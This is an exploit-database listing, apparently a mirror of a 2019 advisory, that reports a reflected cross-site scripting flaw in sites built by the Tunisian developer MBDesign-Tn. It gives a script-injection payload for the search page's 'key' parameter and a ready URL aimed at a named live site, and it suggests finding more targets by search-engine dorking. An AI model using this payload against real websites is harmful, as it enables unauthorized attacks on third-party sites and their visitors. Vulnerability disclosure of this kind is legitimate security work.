Advertisement






Developpe par MBDesign-Tn Tunisia XSS Vulnerability

CVE Category Price Severity
CWE-79 Unknown Unknown
Author Risk Exploitation Type Date
MBDesign TN Unknown Remote 2019-04-17
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 0.39697 0.94426

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040162

Below is a copy:

Developpe par MBDesign-Tn Tunisia XSS Vulnerability
====================================================================================================================================
| # Title     : Developpe par MBDesign-Tn Tunisia XSS Vulnerability                                                                |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | 
| # Vendor    : http://mbdesign-tn.com                                                                                             |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : /resultat-recherche.php?key=<script>alert(/indoushka/);</script>

[+] https://biotechpole.tn/resultat-recherche.php?key=%3Cscript%3Ealert(/indoushka/);%3C/script%3E


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.